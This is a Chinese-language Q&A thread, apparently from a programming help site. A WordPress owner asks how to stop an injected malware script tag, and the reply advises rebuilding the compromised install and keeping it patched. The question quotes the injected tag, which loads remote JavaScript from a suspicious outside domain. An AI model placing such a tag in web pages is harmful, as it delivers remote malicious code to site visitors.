防止恶意软件javascript执行

Cre*_*Dip 0 javascript ajax wordpress jquery

我正在使用wordpress网站,我发现了一个恶意软件脚本,每当我尝试保存页面并点击WYSIWYG中的文本面板时,恶意软件javascript标记会自动添加到页面中.这是自动添加的脚本.

<script type="text/javascript" src="http://cracks4free.info/5/adds.js" async=""></script>
Run Code Online (Sandbox Code Playgroud)

我试图通过以下代码删除src文件.但它没有用,脚本在关闭body标签之前执行.我尝试使用此脚本,但恶意软件脚本在加载所有javascript后加载.这是我的代码.

<script type="text/javascript">
$("script[src='http://cracks4free.info/5/adds.js']").remove()
</script> 
Run Code Online (Sandbox Code Playgroud)

我需要删除此代码,或阻止此代码通过javasript,jquery,ajax执行任何东西..只是想摆脱这个.谢谢

Ham*_*ish 5

如果您的服务器已被盗用,则需要重建它:

  1. 导出现有内容
  2. 使用最新的wordpress版本重建该框
  3. 导入您的内容
  4. 定期应用安全更新

尝试使用javascript来清理内容不是一个解决方案.你有一个妥协的Wordpress安装,其他一些脚本小伙子添加他们自己的个人接触或更糟糕的事情是时间问题.